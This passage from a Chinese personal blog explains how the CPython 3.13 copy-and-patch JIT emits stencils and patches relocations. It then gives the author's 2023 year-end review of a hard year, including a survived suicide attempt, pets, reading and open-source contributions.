0x80, 0x75, 0x49, 0x49, 0x8b, 0x06, 0x48, 0x85, 0xc0, 0x74, 0x07, 0x48, 0xff, 0x80, 0x78, 0x58, 0x09, 0x00, 0xff, 0xd1, 0x48, 0xff, 0x88, 0xc8, 0x15, 0x04, 0x00, 0x49, 0xff, 0x0c, 0x24, 0x75, 0x2b, 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x89, 0xe7, 0xff, 0xd0, 0xeb, 0x1a, 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xef, 0xff, 0xd0, 0x48, 0x89, 0xd9, 0x41, 0xf6, 0x44, 0x24, 0x03, 0x80, 0x74, 0xb7, 0x49, 0x8d, 0x47, 0xf0, 0x4d, 0x85, 0xed, 0x74, 0x2e, 0x49, 0x83, 0xc7, 0xf8, 0x4c, 0x89, 0x28, 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x7c, 0x24, 0x08, 0x4c, 0x89, 0xfe, 0x48, 0x8b, 0x54, 0x24, 0x10, 0x48, 0x83, 0xc4, 0x18, 0x5b, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0x5d, 0xff, 0xe0, 0x48, 0x8b, 0x4c, 0x24, 0x08, 0x48, 0x29, 0xc8, 0x48, 0x83, 0xc0, 0xb8, 0x48, 0xc1, 0xe8, 0x03, 0x89, 0x41, 0x40, 0x31, 0xc0, 0x48, 0x83, 0xc4, 0x18, 0x5b, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0x5d, 0xc3};
static const Hole _BINARY_OP_ADD_INT_code_holes[7] = {
    {0x25, HoleKind_R_X86_64_64, HoleValue_ZERO, &_Py_stats, 0x0},
    {0x3e, HoleKind_R_X86_64_64, HoleValue_ZERO, &_PyLong_Add, 0x0},
    {0x57, HoleKind_R_X86_64_64, HoleValue_ZERO, &PyInterpreterState_Get, 0x0},
    {0xad, HoleKind_R_X86_64_64, HoleValue_ZERO, &PyObject_Free, 0x0},
    {0xbe, HoleKind_R_X86_64_64, HoleValue_ZERO, &PyObject_Free, 0x0},
    {0xe8, HoleKind_R_X86_64_64, HoleValue_CONTINUE, NULL, 0x0},
};

最终所有指令编译完成后，最终会生成 jit_stencils.h 文件，被我们其余 CPython 代码引用，编译进我们的二进制中

然后我们来看下，我们的 JIT 是如何工作的

int
_PyJIT_Compile(_PyUOpExecutorObject *executor)
{
    // Loop once to find the total compiled size:
    size_t code_size = 0;
    size_t data_size = 0;
    for (Py_ssize_t i = 0; i < Py_SIZE(executor); i++) {
        _PyUOpInstruction *instruction = &executor->trace[i];
        const StencilGroup *group = &stencil_groups[instruction->opcode];
        code_size += group->code.body_size;
        data_size += group->data.body_size;
    }
    // Round up to the nearest page (code and data need separate pages):
    size_t page_size = get_page_size();
    assert((page_size & (page_size - 1)) == 0);
    code_size += page_size - (code_size & (page_size - 1));
    data_size += page_size - (data_size & (page_size - 1));
    char *memory = jit_alloc(code_size + data_size);
    if (memory == NULL) {
        goto fail;
    }
    // Loop again to emit the code:
    char *code = memory;
    char *data = memory + code_size;
    for (Py_ssize_t i = 0; i < Py_SIZE(executor); i++) {
        _PyUOpInstruction *instruction = &executor->trace[i];
        const StencilGroup *group = &stencil_groups[instruction->opcode];
        // Think of patches as a dictionary mapping HoleValue to uint64_t:
        uint64_t patches[] = GET_PATCHES();
        patches[HoleValue_CODE] = (uint64_t)code;
        patches[HoleValue_CONTINUE] = (uint64_t)code + group->code.body_size;
        patches[HoleValue_DATA] = (uint64_t)data;
        patches[HoleValue_EXECUTOR] = (uint64_t)executor;
        patches[HoleValue_OPARG] = instruction->oparg;
        patches[HoleValue_OPERAND] = instruction->operand;
        patches[HoleValue_TARGET] = instruction->target;
        patches[HoleValue_TOP] = (uint64_t)memory;
        patches[HoleValue_ZERO] = 0;
        emit(group, patches);
        code += group->code.body_size;
        data += group->data.body_size;
    }
    if (mark_executable(memory, code_size) ||
        mark_readable(memory + code_size, data_size))
    {
        jit_free(memory, code_size + data_size);
        goto fail;
    }
    executor->base.execute = execute;
    executor->jit_code = memory;
    executor->jit_size = code_size + data_size;
    return 1;
fail:
    return PyErr_Occurred() ? -1 : 0;
}

这一部分代码看似很复杂，实际上核心代码很简单，利用 jit_alloc 生成一块内存，然后利用 emit 将我们的汇编代码写入到这块内存中，然后利用 mark_executable 和 mark_readable 将这块内存标记为可执行和可读，最终将这块内存的地址赋值给我们的 executor，这样我们的 executor 就可以执行我们的 JIT 代码了

然后

patches[HoleValue_CODE] = (uint64_t)code;
patches[HoleValue_CONTINUE] = (uint64_t)code + group->code.body_size;
patches[HoleValue_DATA] = (uint64_t)data;
patches[HoleValue_EXECUTOR] = (uint64_t)executor;
patches[HoleValue_OPARG] = instruction->oparg;
patches[HoleValue_OPERAND] = instruction->operand;
patches[HoleValue_TARGET] = instruction->target;
patches[HoleValue_TOP] = (uint64_t)memory;
patches[HoleValue_ZERO] = 0;

这一部分就是将我们提前预置的一些 flag 设定具体的值，以便后续的 patch

然后 patch 核心的部分，就是根据各平台的 LDD 规则来将我们动态的一些地址 patch 到 relocate 的位置

switch (hole->kind) {
    case HoleKind_IMAGE_REL_I386_DIR32:
        // 32-bit absolute address.
        // Check that we're not out of range of 32 unsigned bits:
        assert(value < (1ULL << 32));
        *loc32 = (uint32_t)value;
        return;
    case HoleKind_ARM64_RELOC_UNSIGNED:
    case HoleKind_IMAGE_REL_AMD64_ADDR64:
    case HoleKind_R_AARCH64_ABS64:
    case HoleKind_X86_64_RELOC_UNSIGNED:
    case HoleKind_R_X86_64_64:
        // 64-bit absolute address.
        *loc64 = value;
        return;
    case HoleKind_R_AARCH64_CALL26:
    case HoleKind_R_AARCH64_JUMP26:
        // 28-bit relative branch.
        assert(IS_AARCH64_BRANCH(*loc32));
        value -= (uint64_t)location;
        // Check that we're not out of range of 28 signed bits:
        assert((int64_t)value >= -(1 << 27));
        assert((int64_t)value < (1 << 27));
        // Since instructions are 4-byte aligned, only use 26 bits:
        assert(get_bits(value, 0, 2) == 0);
        set_bits(loc32, 0, 26, value, 2);
        return;
    case HoleKind_R_AARCH64_MOVW_UABS_G0_NC:
        // 16-bit low part of an absolute address.
        assert(IS_AARCH64_MOV(*loc32));
        // Check the implicit shift (this is "part 0 of 3"):
        assert(get_bits(*loc32, 21, 2) == 0);
        set_bits(loc32, 5, 16, value, 0);
        return;
    case HoleKind_R_AARCH64_MOVW_UABS_G1_NC:
        // 16-bit middle-low part of an absolute address.
        assert(IS_AARCH64_MOV(*loc32));
        // Check the implicit shift (this is "part 1 of 3"):
        assert(get_bits(*loc32, 21, 2) == 1);
        set_bits(loc32, 5, 16, value, 16);
        return;
    case HoleKind_R_AARCH64_MOVW_UABS_G2_NC:
        // 16-bit middle-high part of an absolute address.
        assert(IS_AARCH64_MOV(*loc32));
        // Check the implicit shift (this is "part 2 of 3"):
        assert(get_bits(*loc32, 21, 2) == 2);
        set_bits(loc32, 5, 16, value, 32);
        return;
    case HoleKind_R_AARCH64_MOVW_UABS_G3:
        // 16-bit high part of an absolute address.
        assert(IS_AARCH64_MOV(*loc32));
        // Check the implicit shift (this is "part 3 of 3"):
        assert(get_bits(*loc32, 21, 2) == 3);
        set_bits(loc32, 5, 16, value, 48);
        return;
    case HoleKind_ARM64_RELOC_GOT_LOAD_PAGE21:
        // 21-bit count of pages between this page and an absolute address's
        // page... I know, I know, it's weird. Pairs nicely with
        // ARM64_RELOC_GOT_LOAD_PAGEOFF12 (below).
        assert(IS_AARCH64_ADRP(*loc32));
        // Number of pages between this page and the value's page:
        value = (value >> 12) - ((uint64_t)location >> 12);
        // Check that we're not out of range of 21 signed bits:
        assert((int64_t)value >= -(1 << 20));
        assert((int64_t)value < (1 << 20));
        // value[0:2] goes in loc[29:31]:
        set_bits(loc32, 29, 2, value, 0);
        // value[2:21] goes in loc[5:26]:
        set_bits(loc32, 5, 19, value, 2);
        return;
    case HoleKind_ARM64_RELOC_GOT_LOAD_PAGEOFF12:
        // 12-bit low part of an absolute address. Pairs nicely with
        // ARM64_RELOC_GOT_LOAD_PAGE21 (above).
        assert(IS_AARCH64_LDR_OR_STR(*loc32) || IS_AARCH64_ADD_OR_SUB(*loc32));
        // There might be an implicit shift encoded in the instruction:
        uint8_t shift = 0;
        if (IS_AARCH64_LDR_OR_STR(*loc32)) {
            shift = (uint8_t)get_bits(*loc32, 30, 2);
            // If both of these are set, the shift is supposed to be 4.
            // That's pretty weird, and it's never actually been observed...
            assert(get_bits(*loc32, 23, 1) == 0 || get_bits(*loc32, 26, 1) == 0);
        }
        value = get_bits(value, 0, 12);
        assert(get_bits(value, 0, shift) == 0);
        set_bits(loc32, 10, 12, value, shift);
        return;
}

整体上的思路就是差不多这样一些，剩下的就是一些 corner case 的处理，本文先不在展开。大家感兴趣的话，我单独开单篇再来聊一些

总结

我们能发现 Python 3.13 JIT 方案的一个很大的特点是，尽可能的利用了 LLVM 生态的东西，编译器用 clang，编译参数开 -o3 获取最大的性能，二进制用具用 llvm-objdump 和 llvm-readelf，这样做相较于其余方案的好处非常非常的明显

clang 的编译器优化能力非常强，能够生成非常高效的代码
能够利用 LLVM 生态的工具链，能够更好的处理跨平台的问题
避免了人工维护的困境，大部分的改动也能通过自动化的方式生成与集成，避免低级错误的诞生

所以我说 Python 3.13 的 JIT 方案可谓是又新又好

Per aspera, Ad astra

2023-12-29T15:00:00.000Z

外星人一定很奇怪，本星际云本地泡银河系猎户悬臂边缘的太阳系第三行星的人类，怎么又在开始为他们庆祝行星绕行一圈开始忙碌了呢？

开篇

如果要说要说今年最让我记忆犹新的瞬间，那么毫无疑问是今年8月，月初的某一天，我毫无征兆的突然情绪爆发，冲到窗口边打开窗户，试图从十八楼一跃而下。不过可能我没法有游戏里的主角这一样的光环，落地，转身，拍拍屁股走人。可能只是在繁华的街道上徒留一地碎肉。

所以，妹子不知道为啥发觉了我的异常，在我一只脚迈出窗外的时候，死命将我拉了回来。我从没想过她的力气会那么大，会那样的无畏的拉着我。

所以我有些闲暇坐在这，写下这篇文章。

生活

从试图跳楼往前回溯，是连续几周的同一个噩梦，梦回到了自己被强奸的现场，每一次都是同样的真实。可能我想我的一些坚守的防线在不知不觉中被打破了吧。

如果说2023的关键词第一个是爱，那么第二个应该就是 tough 了

无数的噩梦，自我的怀疑，各种不如意的琐事，最喜爱的演员的离世，最惨的时候两周去了六次急诊缝了5针，打了三针，这一些 tough ，负面的词一直环绕着我。某种意义上今年是我内心猛兽更被释放的一年。我某种意义上一度陷落十来岁那种暴戾的状态，所幸，我挺了过来。

抛开那些 tough 的内容，这一年，其实也是蛮有希望的

最大的变化是我们家迎来了一位新的成员，边牧林克，一个让你操心不已，但是却又让你想起来很有感觉的小狗。他在学会使用说话按钮最喜欢表达的一个词就是 “Loving You”。是不是非常的暖！（当然林克的操心程度非常的大，包括不仅限于撕了我概率论的书，啃了我不少电子产品，没事偷吃猫粮导致拉肚子（但是我们依然还是一只可爱的小狗

而另外一个变化是，我们家迎来了一位特殊的成员，一只叫小熊的小猫，或者是老猫。小熊是一只流浪猫，在夏日的某一个夜晚和我相遇，当时的我和妹子在因为家里已经有过多的猫而纠结时，我们说，如果我叫他，他过来，我们就救。话音未落，小熊便打着呼噜过来了，毫无防备。那么就救吧。

小熊是一只脾气异常好的猫，在住院时便成为医院的医护人员的心头宝，他也是一只异常努力的猫。努力的活着，异常努力的活着，他在我们遇见他时状态便很不好，重度口炎+肾衰，这对于任何生物来说都是异常痛苦的。但是小熊成功的挺了过来，现在状态非常稳定。回家后，小熊最喜欢躺的地方是我枕边，听着他打呼噜的时候，我在想某种意义上我在想小熊和我相遇某种意义上算是命中注定，互相拯救。

说到这个，突然想起今年一件让我开心很久的事，我一直捐助的学生，今年非常顺利的考上了大学，看着她顺利走出大山时候的笑容，我觉得我捐助的钱花的非常值得。“教育是最好的公益”

当然我 2023 年也还折腾了很多东西

家里的 HomeLab 经过三个版本的大升级
和小狗一起去了很多次宠物营地
看了很多杂书
1. 叫魂
2. 风沙星辰
3. 人类群星闪耀时
4. 银河系搭车客指南
5. 东京贫困女子
6. etc..

差不多是这样，如果说 2023 年是足够 tough 的一年，那么被爱与希望环绕着的我，也好歹算是走了出来

感情

感情继续进入了第五个年头，可能还会有剩下很多个年头

只是没有想到，今年突然给这一份感情加上了不少的厚重感，荆澈同学现在是我字面意义上的救命恩人Hhhhhhh

从某个意义上来说，在生死交杂的混乱边界，很多时候我会迷失，会徘徊，但是有些时候想沉沦下去的时候，会感觉背后有一双手一直在用尽全力拽着我。当我回头时总会想起荆澈同学哭喊的那句话“你死了我咋跟你爸妈交代啊”

说点轻松的，今年的感情特殊的一点是，我们有狗之后，我们俩的分工便成为了，我负责狗的日常，她负责狗的训练。某种意义上来说我们算是体验一定程度上的无痛当爹/妈

不管怎么样，希望24年也能顺利的走下去，一定要多出去玩（23年我状态不好没咋出门，感觉对不起荆澈同学（

啊！荆澈同学今年还给我买了变身器，她让我扛不住的时候按下变身器变身成奥特曼就好了！

Gaia！（超大声

工作与技术

今年的技术生涯，可以总结为一句话”改革，啊不，学习进入了深水区“

是的，毫无疑问的进入了深水区，站在29岁的当下，我不由的发现，技术的学习对于我来说似乎到了一个新的瓶颈。我需要更多的去思考，去理解，去实践，去总结。而且期间有一件事对于我来说是致命的

做的事情没有办法很快的见效

是的。我现在学习，去体验很多的很多东西，他们的结果可能需要以周或者月乃至季度为单位才能看到。这对于我来说无疑是一个巨大的挑战。我在此期间会不断的进入一个焦虑，与自我怀疑的状态。质疑自己是否还能继续走下去，质疑自己是不是一个垃圾。

而这种焦虑感也会体现在我的工作中，我的 Leader 曾经对我说”我感觉你很多时候在不断的找事来做“。Exactly，某种意义上是在填补心中的空虚。换句话说，我自己让自己陷入到一个 Everythings issues go go go 的状态中。

从另外一个方面来讲，今年的一个经常被提起的话题是 AI 是否会最终让你失业。我对此倒是有很坚定的信任，在肉眼可见的时间里，人终究还是会作为可靠性的最后一道防线

聊聊自己做的一些事吧

在学习方面，今年主要是通过 CSAPP 对于计算机体系结构有了更深入的理解，包括配合对照 Linux 内核里的一些实现，对于整体的计算机体系的 sense 有了不小的提升。这一点也体现在我在社区和工作中调试一些问题的时候，我的直觉会更为准确。

另外一点我自己觉得比较好玩的是，今年机缘巧合之下，因为调试的需求，去系统的看了一些 ELF 的里调试信息 DWARF 的一些东西，这也帮助我在做一些场景下问题定位的时候，更加的准确。

在开源项目方面，今年各种项目多多少少有一些参与，大概列一些把

nerdctl CMD 入口完整重构了，让其余项目可以更好的使用
Apache OpenDAL 项目，写了不少 Rust，拾掇了 Python binding 和不少 CI。晋升了 Committer/PPMC
runc 在帮助人兜底一些历史遗留但是没人继续跟进的 PR
开始给 Kernel 提 patch（虽然被拒了不少

然后去 PyCon China 做了最后两场分享，半参与的开始恢复一些博客的录制

整体来说，今年输出还是比去年少不少的

如果说明年有什么想做的事的话，那么还挺多的

继续学习 Rust
写一些 CPU Simulator，比如最近已经开工想写一个 NES Simulator
把 runc 的一些 C/Go 混杂的部分扬了
继续学习 ELF/DWARF
去搞一搞 eBPF VM 的东西

仔细想想也还挺有时不我待之感

总结

差不多这样吧。对照了一下去年列的 OKR，今年其实有不少没有完成，但是我还是想冒昧给自己一个 3.75（XD，毕竟我活下来了（阿里味太重了（不是

在生死交杂的世界里，唯有爱与希望是我们继续下去的动力

Per aspera, Ad astra

我很喜欢的翻译是

循此苦旅，终抵星辰